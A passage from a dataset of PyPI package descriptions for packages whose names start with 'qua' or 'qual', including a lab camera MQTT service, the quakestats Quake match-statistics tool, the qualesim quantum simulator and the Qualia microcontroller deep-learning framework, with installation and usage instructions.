thebroker,port,userandpasswordof the MQTT broker. Thebasetopicis a topic string\nthat gets prepended to every message and to every subscription.Currently this module subscribes to the following topics:triggerwill allow software triggering of the camera (currently not implemented)setrunsets the current run parameters. Those are a currentrunprefixwhich\nis a single string that gets prepended in front of every filename and an optional\nlist of strings calledrunsuffixthat are used instead of numbering the frames\nin consecutive order on each hardware trigger.exposure/setallows one to pass a message containing anexposure_msfield to\nupdate the exposure. The camera interrupts streaming and triggering operation during\nchanges.The camera publishes:raw/storedwhenever a new raw frame has been stored and uploaded to\nthe configured servers. It contains alocalfilenameand aimagefilename.\nThe local filename also includes the path on the camera server while the\nimage filename is just the filename without any path by itself.Camera sectionthorcamserialis able to specify the serial number of the camera that the service\nshould bind to. In case no serial is specified the first available camera is usedtriggeris an dictionary that is able to configure the default trigger\nsettings:hardwarecan betrueorfalsecountspecifies the number of frames to capture after the trigger has\ntriggered the camera. This has to be either 0 for continuous capture or\nan positive integer.exposurecan be used to set the default exposure (in milliseconds)Local file storageimagedirspecifies the directory where images should be stored locallyUpload configuration (SFTP)rawframesftpis a list of hosts to which the camera server should upload\ncaptured raw frames. Each entry is a dictionary that contains:hostspecifies the host to which the upload should be madeuserspecifies the SSH userdestpathis the path on the remote machine where the images should be storedkeyfilepoints to the SSH private key file that should be used for authenticationExample configuration file{\n\t\"mqtt\" : {\n\t\t\"broker\" : \"10.0.0.5\",\n\t\t\"port\" : \"1883\",\n\t\t\"user\" : \"YourMqttUser\",\n\n\t\t\"password\" : \"NONDISCLOSEDSECRETLONGSTRING\",\n\n\t\t\"basetopic\" : \"quakesr/experiment/camera/ebeam\"\n\n\n\t},\n\t\"thorcam\" : {\n\t\t\"trigger\" : {\n\t\t\t\"hardware\" : true,\n\t\t\t\"count\" : 1\n\t\t},\n\t\t\"exposure\" : 80\n\t},\n\t\"imagedir\" : \"c:\\\\temp\\\\\",\n\t\"rawframesftp\" : [\n\t\t{\n\t\t\t\"host\" : \"10.0.0.15\",\n\t\t\t\"user\" : \"camserv\",\n\t\t\t\"keyfile\" : \"c:\\\\users\\\\quak\\\\id_winselwolf\",\n\t\t\t\"destpath\" : \"/home/pi/measurements/data/images/\"\n\t\t}\n ]\n}Dependenciespaho-mqttis the Eclipse Paho MQTT Python client\nthat provides the interface to the MQTT broker (currently running on anRabbitMQinstance)thorcamis a wrapper around the .NET libraries\nsupplied for the ThorCam service.paramikois a pure Python SSHv2 implementation mainly\nused for file transfer in this application.Pillowis a python image library (PIL) clone\nthat's used to encode the images."} +{"package": "quakestats", "pacakge-description": "Quake StatsQuake 3 logs / Quake Live events processing project.Allows to retrieve, process, analyze, store and present Quake matches.The project doesn't aim to give global stats likeqlstatsit's rather meant to store statistics from some server group (server domain). The origins of Quake Stats come from a group of players who occasionally play together and want to keep track of their matches... and to have fun from some custom made medals (badges) :)OverviewSupported features:processing Quake 3 logs (log parsing, transforming to QL)processing Quake Live event streams (zmq listen on QL server stat endpoint)translating (to some extent) Quake 3 logs into Quake Live eventsanalysing matchesstoring matches in Database backend (Mongo DB)presenting match results through a web applicationSupported mods and game modesUnfortunately only OSP FFA from Quake 3 is well tested as it was the main use casemods- OSP (http://www.orangesmoothie.org/tourneyQ3A/index.html)- Quake Live - most of event processing is implemented- Edawn - requires 1.6.3+ (enchanced logging)- vanilla Q3 not supported (need workaround for missing ServerTime)- CPMA not supported (need workaround for missing ServerTime)modes- DUEL- FFA- CA - partially implemented- TDM- CTFCustom medalsAre described hereresources.jsExamplesThe stats are presented with fancy charts, custom medals, etc. See the examples below.Total badges/medals boardTotal kills & deathsSingle match Kill Death Ratio, Worst Enemy, Score over Time chartRequirementsPython 3.6+Instance of Mongo DB (pointed bysettings.py)Modern web browser (requires css grid-layout)How to setupIn order to setup the application you need to have python 3.6+ (virtualenv recommended) and an instance of mongo DB.InstallationInstall from pip packagepipinstallquakestatsInstall from source code (optional)Is also needed installquakestatspackage (in virtualenv if you are using it). To do that you could install it directlypipinstall-rrequirements.txt\npythonsetup.pyinstallConfiguration fileThe application is configured by settingQUAKESTATS_SETTINGSenvironment variable to path to configuration file.\nSee examplesettings.pyVerify if everything is properly set upQuake Stats provide a simple CLI with a command to verify an environmentquakestatsstatusExample output:(venv) [user@pc quakestats]$ quakestats status\napp -> version: 0.9.61\nsettings -> env var: /opt/quakestats/settings.py\nsettings -> RAW_DATA_DIR: /opt/quakestats/data\ndb -> ping: {'ok': 1.0}\nwebapp -> loadable: Quakestats webapp is loadableRun Quake Stats web appYou can setup Quake Stats web app with any websever you want (as long as it supports python, e.g. mod wsgi, uwsgi).\nThis documentation covers only running intwistedwebserverRun in twistd (example)You can launch Quake Stats web application usingtwistdwebserver. Just make sure to install twisted framework first.\nAlso make sure to use some recent version of twisted (tested with 18.7.0 installed by pip).pipinstalltwistedFLASK_APP=\"quakestats.web\";QUAKESTATS_SETTINGS=`pwd`/settings.py;twistdweb--wsgiquakestats.web.appUser/Admin guideSetup admin userAdmin user is used by web application to access some additional administrative operations. For now it's only setting map sizes. Just to have a list of recently used maps and their sizes. Nothing more at the moment.# you need to run the command in proper python environment# use \"quakestats status\" to check your environmentquakestatsset-admin-pwdCollecting Quake Live statsQuake Live exposes stats server through tcp socket (zmq) authenticated with password.\nCLI can gather stats from multiple QL servers and process them automatically.\nUse following config file[server-1]ip=5.6.7.8port=27967password=password1[server-1]ip=1.2.3.4port=27967password=password2Use following CLI to start collecting events (assuming your config file is namedcollector.cfg)quakestatscollect-qlcollector.cfgUploading Quake 3 log fileIn order to process some data you need to send your match log file to web api endpoint/api/v2/upload. By default modospis assumed.\nMod specific endpoint is served under/api/v2/upload/, e.g./api/v2/upload/edawnYou need anADMIN_TOKENset in configuration.curl-XPOST--formfile=@/path/to/your/games.log--formtoken=adminsecrettokenhost:port/api/v2/uploadAll log files with extracted matches are stored in directory determined byRAW_DATA_DIRconfig entryUsing automated script to send logsTODO, deprecatedRebuilding databaseYou can rebuild your database using files stored inRAW_DATA_DIRwith simple web api call or CLI.curl-XPOSThost:port/api/v2/admin/rebuild--formtoken=adminsecrettoken# you need to run the command in proper python environment# use \"quakestats status\" to check your environmentquakestatsrebuild-dbIf you implement some new Medals or any other backend related feature this API call will clear previous data stored in DB and process all matches from data directory once again.Merging player resultsUnfortunately the only way to distinguish players in Quake 3 servers is to use player nickname. When player changes his nickname between matches he will be treated as new unique player. In such cases admin can merge results of two specific players. Use with caution as it will rewrite history of all matches stored in database.curl-XPOSThost:port/api/v2/admin/players/merge--formtoken=admintoken--formsource_player_id=297f6272f79d4918c4efe098--formtarget_player_id=df55e5cd4582d6f14cd20746It will merge all results from player with id297f6272f79d4918c4efe098into player with iddf55e5cd4582d6f14cd20746. To find out how player ID is build see the development section.Importing preprocessed match logPreprocessed match logs stored inRAW_DATA_DIRcan be imported using admin match import API.\nThis can be particularly useful when e.g. debugging some bugs on dev infra.curl-XPOST--formfile=@bugmatch.log--formtoken=admintokenhost:port/api/v2/admin/match/importDevelopmentTech stackPython, Flask, MongoDB, d3.js, riot.js, zmqHow does it work with Quake 3 PlayersQuake 3 players don't have unique ID's so it's hard to distinguish players between matches. In order to overcome this problem each player hasplayer_idassigned during match analysis. The ID is constructed as hash ofSERVER_DOMAINand player nickname as a result it's consistent between matches as long as player keeps his nickname and there is no nickname clash. Perhaps there is some better way? Server side auth?WebWeb application related componentsapi - web API used by frontend and to retrieve Quake 3 logsviews - typical flask viewsExtendingHow to add new medalseeSpecialScores class- for special scoresseeBadger class- for badges calculationseeJS resources- to add new medal imageRunning testsmaketestAssetsMedals, icons, etc.\nSome of the assets are missing it would be nice to find some free ones or draw them ;)How to release new versionbumpversion--commit--tag"} +{"package": "quala", "pacakge-description": "qualaQuala implements different accelerators for optimization\nsolvers, root finders and fixed-point methods, such as Broyden-type quasi-Newton\nmethods and Anderson acceleration.The algorithms are implemented in C++, and are available through a Python\ninterface.InstallationThe Python interface can be installed fromPyPIusingpip:python3-mpipinstallqualaInstallation instructions for the C++ library can be found in thedocumentation.Examples and documentationPython Documentation (Sphinx)C++ Documentation (Doxygen)Python Examples (Sphinx)C++ Examples (Doxygen)"} +{"package": "qualang-tools", "pacakge-description": "QUA Language ToolsThe QUA language tools package includes various tools useful while writing QUA programs and performing experiments.It includes:QUA Loops Tools- This library includes tools for parametrizing QUA for_ loops using the numpy (linspace, arange, logspace) methods or by directly inputting a numpy array.Plotting Tools- This library includes tools to help handling plots from QUA programs.Result Tools- This library includes tools for handling and fetching results from QUA programs.Units Tools- This library includes tools for using units (MHz, us, mV...) and converting data to other units (demodulated data to volts for instance).Analysis Tools- This library includes tools for analyzing data from experiments.\nIt currently has a two-states discriminator for analyzing the ground and excited IQ blobs.Multi-user tools- This library includes tools for working with the QOP in a multi-user or multi-process setting.Bakery- This library introduces a new framework for creating arbitrary waveforms and\nstoring them in the usual configuration file. It allows defining waveforms in a QUA-like manner while working with 1ns resolution (or higher).External Frameworks- This library introduces drivers for integrating the OPX within external frameworks such as QCoDeS. Please refer to theexamplessection for more details about how to use these drivers.Addons:Calibrations- This module allows to easily perform most of the standard single qubit calibrations from a single python file.Interactive Plot Library- This package drastically extends the capabilities of matplotlib,\nenables easily editing various parts of the figure, copy-pasting data between figures and into spreadsheets,\nfitting the data and saving the figures.assign_variables_to_element- Forces the given variables to be used by the given element thread. Useful as a workaround for when the compiler\nwrongly assigns variables which can cause gaps.Config Tools- This package includes tools related to the QOP configuration file, including:Integration Weights Tools- This package includes tools for the creation and manipulation of integration weights.Waveform Tools- This package includes tools for creating waveforms useful for experiments with the QOP.Config Helper Tools- This package includes tools for writing and updating the configuration.Config GUI- This package contains a GUI for creating and visualizing the configuration file - No longer being actively developed.Config Builder- This package contains an API for creating and manipulation configuration files - No longer being actively developed.Control Panel- This package includes tools for directly controlling the OPX.ManualOutputControl- This module allows controlling the outputs from the OPX in CW mode. Once created, it has an API for defining which channels are on. Analog channels also have an API for defining their amplitude and frequency.VNA- This module allows to configure the OPX as a VNA for a given element (readout resonator for instance) and operation (readout pulse for instance) already defined in the configuration. Once created, it has an API for defining which measurements are to be run depending on the down-conversion solution used (ED: envelope detector, IR: image rejection mixer, IQ: IQ mixer).InstallationInstall the current version usingpip, the--upgradeflag ensures that you will get the latest version.pipinstall--upgradequalang-toolsNote that in order use theConfig GUIorConfig Builder, you need to install usingpipinstall--upgradequalang-tools[configbuilder]Note that in order use theInteractive Plot Library, you need to install usingpipinstall--upgradequalang-tools[interplot]Support and ContributionHave an idea for another tool? A way to improve an existing one? Found a bug in our code?We'll be happy if you could let us know by opening anissueon theGitHub repository.Feel like contributing code to this library? We're thrilled! Please followthis guideand feel free to contact us if you need any help, you can do it by opening anissue:)UsageExamples for using various tools can be found on theQUA Libraries Repository.Examples for using the Baking toolbox, including 1-qubit randomized benchmarking, cross-entropy benchmark (XEB), high sampling rate baking and more can be foundhere."} +{"package": "qualdocs", "pacakge-description": "A python library for supporting open qualitative coding of text data in Google Docs comments. Integrates with the Google Docs API via PyDrive to create pandas dataframes for each code/tag and the highlighted text in a set of documents."} +{"package": "qualesim", "pacakge-description": "StartThe QuaLeSim(Quantum Lego Simulator) is an adapted version of DQCSim. For quantum circuit simulation, you can simulate QUIET-s and QCIS instruction by it.\nAnd what's more, now the QuaLeSim is integrated into the backend of Quingo, you can use it directly after installing quingoc and quingo-runtime. More inforemations is available in [[#Install]]InstallThe QuaLeSim now is only for Linux platform.\u73af\u5883\u51c6\u5907\uff1aLinux platform withpython>=3.6Rust # if you don't have rust, make sure you have'curl'to install rust in the setup.py .\u5b89\u88c5\u8bf4\u660e\uff1aYou can get the source code from giteegit clone git@gitee.com:quingo/qualesim.git\n cd qualesim\n git checkout task/fix-bugs\n git submodule update --init --recursive \n # you must have the limits of authority of quiet-parser, dqcsim-qcis, \n # dqcsim-quiets, dqcsim-tequila, dqcsim-quantumsim.\n pip install -r requirements.txt\n pip install . # the step may be very slow, you can use command below.\n \t\t\t # python setup.py bdist_wheel\n \t\t\t # cd /target/python/build/bdist.linux-x86_64/wheel\n \t\t\t # pip install xxx.whl\n \t\t\t # \u5b58\u5728LLVM\u7684\u60c5\u51b5\u4e0b\u4f1a\u5f88\u6162\uff0c\u6682\u65f6\u4e0d\u6e05\u695a\u539f\u56e0\uff0c\u6b63\u5728\u4fee\u6539\u4e2d\u3002externs:# The Simulator is for QCIS and QUIET-s, and now the quingo-0.2.3 can generate QCIS \n and QUIET-s\n # so you can install quingoc and quingo-runtime to use it.\n # quingoc:\n git clone git@gitee.com:quingo/quingo-compiler.git\n git checkout enh/I7U2U5/refactor_frontend\n\n 1. add eigen \n \tmkdir \n \tcd \n \tcp /mnt/share/eigen-3.4.0.zip .\n \tunzip eigen-3.4.0.zip\n \t\n \t# then copy Eigen and unsupported to quingo-compiler/extern and like \n \t- `quingo-compiler/extern/Eigen/src/SparseCholesky/SimplicialCholesky.h`\n \t\t- SimplicialCholesky& setMode(SimplicialCholeskyMode mode)(around line 545):\n \t\t{\n \t\t switch(mode)\n \t\t {\n \t\t case SimplicialCholeskyLLT:\n \t\t m_LDLT = false;\n \t\t break;\n \t\t case SimplicialCholeskyLDLT:\n \t\t m_LDLT = true;\n \t\t break;\n \t\t default: // delete this line\n \t\t break; // delete this line\n \t\t }\n \t\t}\n \t- `quingo-compiler/extern/unsupported/Eigen/MatrixFunctions`\n 2. cd quingo-compiler/build\n 3. cmakeninja ..\n 4. ninja\n 5. ln -s /build/bin/quingoc ~/.local/bin/quingoc # \u5efa\u7acb\u8f6f\u94fe\u63a5\n\n # quingo-runtime and other simulators:\n git clone git@gitee.com:quingo/quingo-runtime.git\n cd quingo-runtime\n git checkout task/backend-result\n pip install -e .\n\n git clone git@gitee.com:quingo/pyqcisim.git\n cd pyqcisim\n git checkout bug-fix\n pip install -e .\n\n git clone git@gitee.com:quingo/SymQC.git\n cd SymQC\n pip install -e .\n ``` ^dea5d0Quick StartQuick Start is for users use the Simulator directly or use it with quingo-runtime. Some examples are available below.For independent users:The Simulator can simulate QUIET-s and QCIS instructions, you can use it directly:fromdqcsim.pluginimport*fromdqcsim.hostimport*sim=Simulator(stderr_verbosity=Loglevel.INFO)sim.with_frontend(\"\",verbosity=Loglevel.INFO)# sim.with_frontend(\"\", verbosity=Loglevel.INFO)# Loglevel is for output information for DEBUG/INFO/OFF# If you only want the simulation output, please set it OFFsim.with_backend(\"quantumsim\",verbosity=Loglevel.INFO)# sim.with_backend(\"tequila\", verbosity=Loglevel.INFO)# now we have DQCsim-Tequila and DQCsim-QuantumSim backend for Simulatorsim.simulate()res=sim.run(measure_mod=\"state_vector\",num_shots=10)# Start the simulation with different exe mod,# measure_mod=\"one_shot\" and num_shots=int /# \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \"state_vector\"# the output should besim.stop()final_state=dict()final_state=res[\"res\"]print(final_state)the output is :measure_mod=\"state_vector\":res1(MQ1,MQ2)={'classical':{'Q1':1,'Q2':1},'quantum':(['Q3'],[0j,(1+0j)])}# classical is qubit measured, quantum is qubit unmeasured with state vector.res2()={'classical':{},'quantum':(['Q1','Q2','Q3'],[(0.7071067811865472+0j),0j,0j,0j,0j,0j,0j,(0.7071067811865478+0j)])}measure_mod=\"one_shot\",num_shots=10:# classical is classical value, quantum is qubit measured. and they are one to one correspondenceres(measure(q1)->c1,measure(q2)->c2)={'quantum':[['q1','q2'],[[0,0],[0,0],[1,1],[0,0],[0,0],[1,1],[0,0],[0,0],[1,1],[1,1]]],'classical':[{'c1':[0],'c2':[0]},{'c1':[0],'c2':[0]},{'c1':[1],'c2':[1]},{'c1':[0],'c2':[0]},{'c1':[0],'c2':[0]},{'c1':[1],'c2':[1]},{'c1':[0],'c2':[0]},{'c1':[0],'c2':[0]},{'c1':[1],'c2':[1]},{'c1':[1],'c2':[1]}]}For Quingo UsersYou should follow the [[#Install|extern: quingoc & quingo-runtime installation]] to install it.fromquingoimport*importqututor.global_configasgcfromquingo.backend.qisaimportQisa# input quingo file and simulate qu funcqu_file=gc.quingo_dir/\"ghz.qu\"circ_name=\"GHZ_state\"# set the qisa, and it is the output instructions QUIET,# you can change to Qisa.QCIS or others.task=Quingo_task(qu_file,circ_name,qisa=Qisa.QUIET,)num_shots=10cfg=ExeConfig(ExeMode.SimFinalResult,num_shots)num_qubits=3# now backend BackendType.QUANTUM_SIM, BackendType.DQCSIM_TEQUILA# BackendType.DQCSIM_QUANTUMSIM, BackendType.SYMQC is available.# method 1qasm_fn=compile(task,params=(num_qubits,))res=execute(qasm_fn,BackendType.QUANTUM_SIM,cfg)# method 2# res = call(task, (num_qubits,), BackendType.DQCSIM_TEQUILA, cfg)print(\"res: \",res)the output is :measure_mod=\"state_vector\":res1(MQ1,MQ2)={'classical':{'Q1':1,'Q2':1},'quantum':(['Q3'],[0j,(1+0j)])}# classical is qubit measured, quantum is qubit unmeasured with state vector.res2()={'classical':{},'quantum':(['Q1','Q2','Q3'],[(0.7071067811865472+0j),0j,0j,0j,0j,0j,0j,(0.7071067811865478+0j)])}measure_mod=\"one_shot\",num_shots=10:# quingo-runtime only have quantum values.res(measure(q1)->c1,measure(q2)->c2)=(['q1','q2'],[[0,0],[0,0],[1,1],[0,0],[0,0],[1,1],[0,0],[0,0],[1,1],[1,1]])FAQfor installyour environment donot have rust?you can install rust yourself by theRust \u7a0b\u5e8f\u8bbe\u8ba1\u8bed\u8a00 (rust-lang.org)or just make sure you have command\"curl\", the setup will help you install it automatic.if you have llvm in your platform, the setup install maybe very slow.the problem is to be solved.install about quingocplease refer todocs/DeveloperGuide.md \u00b7 Quingo/quingo-compiler - Gitee.comfor usewhen you first use it, there would be a problem\u6838\u5fc3\u5df2\u8f6c\u50a8it is the dqcsim's problem and is to be solved."} +{"package": "qualesim-qcis", "pacakge-description": "No description available on PyPI."} +{"package": "qualesim-quantumsim", "pacakge-description": "QuaLeSim backend for Quantumsim.It is an adapted version of DQCSim-quantumsim."} +{"package": "qualesim-quiets", "pacakge-description": "DQCSim-Quiets\u4ecb\u7ecd\u672c\u524d\u7aef\u4e3aQuaLeSim-QUIETS\u524d\u7aef\uff0c\u4e3aQuaLeSim\u6846\u67b6\u63d0\u4f9b\u4e86\u4e00\u4e2a\u53ef\u4ee5\u8bc6\u522bQUIET-S\u91cf\u5b50-\u7ecf\u5178\u6df7\u5408\u6307\u4ee4\u96c6\u7684\u524d\u7aef\u63d2\u4ef6\u3002\u5b89\u88c5\u6559\u7a0b\u4e0eQuaLeSim\u534f\u540c\u5b89\u88c5pip install qualesim[PLUGINS]"} +{"package": "qualg", "pacakge-description": "QuAlg (0.1.0)Welcome to QuAlg's README.DocumentationFull documentation can be foundhere.\nThe best way to get started is to have a look at thequickstart-guide.\nThe actual jupyter notebook of the quickstart-guide can be foundhere.InstallationTo install the package do:makeinstallTo verify the installation do:make verify"} +{"package": "qualia", "pacakge-description": "(c) Copyright Afshin T. Darian 2019. All Rights Reserved."} +{"package": "qualia-codegen-core", "pacakge-description": "Copyright 2021 (c) Pierre-Emmanuel Novacpenovac@unice.frUniversit\u00e9 C\u00f4te d'Azur, CNRS, LEAT. All rights reserved.Qualia-CodeGen-CoreConverts a pre-trained Keras .h5 or PyTorch model to C code for inference.Generated C code useschannels_lastdata format.Supported layersActivation: ReLU (combined to previous Conv1D, Dense, MaxPooling1D, AveragePooling1D AddV2), SoftmaxConv1D: optional bias, valid padding onlyDense: optional biasMaxPooling1D: valid padding onlyAveragePooling1D: valid padding onlyFlatten: implies reordering next layer's kernel for data format conversionZeroPadding1D: combined with next Conv1DAddV2Dependenciespython >= 3.9Python:jinja2\nnumpyKerasPython:tensorflow >= 2.6.0\nkeras >= 2.6.0PyTorchPython:torch >= 1.8.0Installationpip install -e .UsageGenerate C code from Keras .h5qualia_codegen Use in your C codeInclude the model: (can also be built as a separate object)#include \"model.h\"Allocateinputsandoutputsarrays with correct dimensions. Remember thatinputsmust havechannels_lastdata format.Call it in your C code:cnn(inputs, outputs);Add the source filemodel.cto your build system. It includes all the other source files for layers, don't add these to the build system.ExamplesSee thesrc/qualia_codegen_core/examples/Linuxdirectory for a demo console application to evaluate model accuracy.src/qualia_codegen_core/examples/qualia_codegen-NucleoL476RGcontains an STM32CubeIDE project for the Nucleo-L476RG board that's currently broken due to some recent changesDocumentationNothing much\u2026Source treesrc/qualia_codegen_core/Allocator.py: manages activation buffer allocation. Tries to group all buffers into one, except when they cannot be overwritten (dependencies).src/qualia_codegen_core/Converter.py: the actual conversion code, parses a Keras model and use the template file associated to each layer to generate C code. When weights have to be written, they are optionally quantized to fixed-point by setting the appropriate parameters ofConverterconstructor (see its definition)src/qualia_codegen_core/Validator.py: work in progress, should contain functions to check if a model can be successfully converted. For now only check activation function.src/qualia_codegen_core/assets/: contains the templates to generate C inference codesrc/qualia_codegen_core/assets/layers/: contains the implementation of the various supported layerssrc/qualia_codegen_core/assets/layers/weights: contains the support for the trainable layers weights"} +{"package": "qualia-codegen-plugin-snn", "pacakge-description": "Copyright 2021 (c) Pierre-Emmanuel Novacpenovac@unice.frUniversit\u00e9 C\u00f4te d'Azur, CNRS, LEAT. All rights reserved.Qualia-CodeGen-Plugin-SNN"} +{"package": "qualia-core", "pacakge-description": "Qualia Core (formerly MicroAI)End-to-end training, quantization and deployment framework for deep neural networks on microcontrollers.Repository should be cloned with--recursiveto get TFLite Micro and its dependencies.DependenciesPython:numpy\nscikit-learn\ntomlkit\ncolorful\ngitpythonDatasetGTSRBPython:imageio\nscikit-imageTrainingTensorFlowPython:tensorflow\ntensorflow_addonsPyTorchPython:pytorch\npytorch_lightningDeploymentEmbedded targetsSparkFun EdgePython:pycryptodomeNucleo-L452RE-PSystem:stm32cubeide\nstm32cubeprogEmbedded frameworksSTM32Cube.AISTM32CubeIDE extension pack:X-CUBE-AI == 5.2.0TensorFlow Lite MicroSystem:arm-none-eabi-binutils\narm-none-eabi-gcc\narm-none-eabi-newlib\nlibopenexr-dev\nwgetQualia-CodeGenPython:jinja2System:arm-none-eabi-binutils\narm-none-eabi-gcc\narm-none-eabi-newlibEvaluationPython:pyserialUsageIf Qualia installed with pip, you can run thequaliacommand directly. Otherwise runPYTHONPATH=. ./bin/qualia from the qualia directory.Dataset pre-processingqualia preprocess_dataTrainingqualia trainPrepare deployment (generate firmware)qualia prepare_deployDeploy and evaluatequalia deploy_and_evaluateRun test suiteCUBLAS_WORKSPACE_CONFIG=:4096:8 PYTHONHASHSEED=2 python -m unittest discover qualia/testsIncluded support for datasets, learning framework, neural networks, embedded frameworks and targetsDatasetsUCI HARGTSRBWritten and Spoken MNISTLearning frameworksTensorFlow.KerasPyTorchNeural networksMLPCNN (1D&2D)Resnetv1 (1D&2D)Embedded frameworksSTM32Cube.AITensorFlow Lite for MicrocontrollersQualia-CodeGenTargetsNucleo-L452RE-PSparkFun EdgeReference & CitationQuantization and Deployment of Deep Neural Networks on Microcontrollers, Pierre-Emmanuel Novac, Ghouthi Boukli Hacene, Alain Pegatoquet, Beno\u00eet Miramond and Vincent Gripon, Sensors, 2021.@article{qualia,\n\tauthor = {Novac, Pierre-Emmanuel and Boukli Hacene, Ghouthi and Pegatoquet, Alain and Miramond, Beno\u00eet and Gripon, Vincent},\n\ttitle = {Quantization and Deployment of Deep Neural Networks on Microcontrollers},\n\tjournal = {Sensors},\n\tvolume = {21},\n\tyear = {2021},\n\tnumber = {9},\n\tarticle-number = {2984},\n\turl = {https://www.mdpi.com/1424-8220/21/9/2984},\n\tissn = {1424-8220},\n\tdoi = {10.3390/s21092984}\n}"} +{"package": "qualia-plugin-snn", "pacakge-description": "Qualia-Plugin-SNNCopyright 2023 \u00a9 Pierre-Emmanuel Novacpenovac@unice.frUniversit\u00e9 C\u00f4te d'Azur, LEAT. All rights reserved.Plugin for Spiking Neural Network support inside Qualia.Installgit clone https://github.com/LEAT-EDGE/qualia-plugin-snn.git\ncd qualia-plugin-snn\npdm venv create\npdm use \"$(pwd)/.venv/bin/python\"\n$(pdm venv activate in-project)\npdm install -G gsc -G codegenRun CIFAR-10 SVGG16 exampleDownloadCIFAR-10 python versionand extract it insidedata/.qualia conf/cifar10/vgg16_bn_ifsr_float32_train.toml preprocess_data\nqualia conf/cifar10/vgg16_bn_ifsr_float32_train.toml train\nqualia conf/cifar10/vgg16_bn_ifsr_float32_train.toml prepare_deploy\nqualia conf/cifar10/vgg16_bn_ifsr_float32_train.toml deploy_and_evaluateAcknowledgmentSpikingJelly[^1][^1]: Please note article V.1 \"Disclosure of Commercial Use\" of theOpen-Intelligence Open Source License V1.0"} +{"package": "qualia-plugin-template", "pacakge-description": "Qualia-Plugin-TemplateCopyright 2023 \u00a9 Pierre-Emmanuel Novacpenovac@unice.frUniversit\u00e9 C\u00f4te d'Azur, LEAT. All rights reserved.Template plugin for Qualia.How to create a plugin from the templateInstall QualiaInstall Qualia with the developer setup using PDM by following theInstallation guide.Install Qualia-Plugin-TemplateMove into the base Qualia folder, then clone the Qualia-Plugin-Template repository:git clone ssh://git@naixtech.unice.fr:2204/qualia/qualia-plugin-template.gitIf you do not have an SSH key registered in Gitlab, use the HTTPS URL instead:git clone https://naixtech.unice.fr/gitlab/qualia/qualia-plugin-template.gitThen install it:pdm add -e ./qualia-plugin-template --devCreate a new Git repository for your pluginIn the Gitlab web interface of theQualia group,\ncreate a new repository by clicking theNew projectbutton. SelectCreate blank project.SetQualia-Plugin-as the project name, withreplaced by the name of your plugin.Select the appropriate visibility levelUncheckInitialize repository with a README.Finally, clickCreate project.Generate a plugin project from the templateMove into the base Qualia folder, then generate the plugin project:pdm run qualia-create-plugin should be replaced by the name of your plugin (without thequalia-plugin-prefix).Then, follow the questions asked to provide the author's name and email address, the homepage and git repository of the plugin.For more information about the structure of the created plugin project,\nseeRepository structure.Push the new plugin to the git repositoryMove into the newly created plugin's folder:cd qualia-plugin-Then push the new content to the repository:git push -u origin masterEdit the plugin dependenciesEdit thepyproject.tomlfile to fill the dependencies required by your plugin,\nin particular any other required Qualia plugin.\nYou can choose between mandatory or optional dependencies.\nAny item inside angle brackets<>must be replaced by a value of your choice.Mandatory dependencies[project]\ndependencies = [\n '',\n '<\u2026>',\n '',\n]Optional dependency groups[project.optional-dependencies]\n = ['', '<\u2026>', '']\n<\u2026>\n = ['', '<\u2026>', '']EditREADME.mdEdit theREADME.mdfile to provide the description of your plugin, a short user guide and any information that the user must know about to use your plugin.Install the plugin and its dependenciesMove into the base Qualia folder, then install your plugin:Then install it:pdm add -e ./qualia-plugin-[,] --devwiththe name of your plugin and,optional dependency groups.Edit documentation builder configurationIf the documentation of the plugin needs to cross-reference external Python modules, add the link to the documentation in the InterSphinx mapping of thedocs/conf.pyfile.\nAny item inside angle brackets<>must be replaced by a value of your choice.intersphinx_mapping = {\n '': ('', None),\n}Provide the Python source files of your moduleAdd any source file for your module under one of Qualia's package in thesrc/qualia_plugin_/folder.Dummy modules for the dataset, learningmodel.pytorch, postprocessing and preprocessing are supplied in the template to illustrate adding new modules for these packages.\nA learningframework override for PyTorch is provided to illustrate overriding an existing module, and, in this case, import the supplied Dummy learningmodel for use with PyTorch.\nThese Dummy modules must be removed before publishing you plugin, unnecessary packages should also be removed.For more information about the various Qualia packages, seePython package structure.\nFor more information about how the plugin's packages are loaded, seePlugin architecture.Provide example configuration filesAdd example configuration files in theconf/directory to demonstrate the usage of your plugin.All configuration files must load the plugin:[bench]\nplugins = ['qualia_plugin_']A Dummy configuration is provided in the template to load the provided Dummy modules. The Dummy configuration must be removed before publishing your plugin.For more information about configuration files, see:Configuration fileProvide documentationAdd any API documentation as docstrings in your source files.Add any high-level documentation pages in thedocs/directory and reference them in the documentation homepage filedocs/index.rst.For more information about writing documentation, see:Writing documentation.Provide tests for your plugin modulesAdd any automatic testing modules that use the PyTest framework in thetests/directory.For more information about tests, see:Tests"} +{"package": "qualichat", "pacakge-description": "Open-source linguistic ethnography tool for framing public opinion in mediatized groups.Table of ContentsInstallingQuickstartLinksInstallingPython 3.7.1 or higher is required.To install the library, you can just run the following command:$pipinstall-UqualichatTo install a development version, follow these steps:$gitclonehttps://github.com/qualichat/qualichat\n$cdqualichat# Linux/MacOS$python3-mpipinstall-U.# Windows$py-3-mpipinstall-U.QuickstartTo use this library, you need a plain chat text file, following this format:[dd/mm/yy hh:mm:ss] : For example, see this following sample chat file namedsample-chat.txt:[01/01/21 07:52:45] Joel: Hello!\n[01/01/21 07:52:47] Mary: Hi!\n[01/01/21 07:52:49] Joel: How are you guys?\n[01/01/21 07:52:52] Mary: We are fine! \u00f0\u0178\u02dc\u0160\nHow about you?\n[01/01/21 07:52:55] Oliva: Everything's great!\n[01/01/21 07:52:59] Joel: Cool! I am also fine!\n[01/01/21 07:53:03] John leftIn your code, you will just load the chat usingqualichat.load_chat().chat=qualichat.load_chat('sample-chat.txt')LinksWebsite:http://qualichat.comDocumentation:https://qualichat.readthedocs.ioSource code:https://github.com/qualichat/qualichat"} +{"package": "qualichat-qualitube", "pacakge-description": "No description available on PyPI."} +{"package": "qualif", "pacakge-description": "MIT LicenseCopyright (c) 2021 diffuserPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS 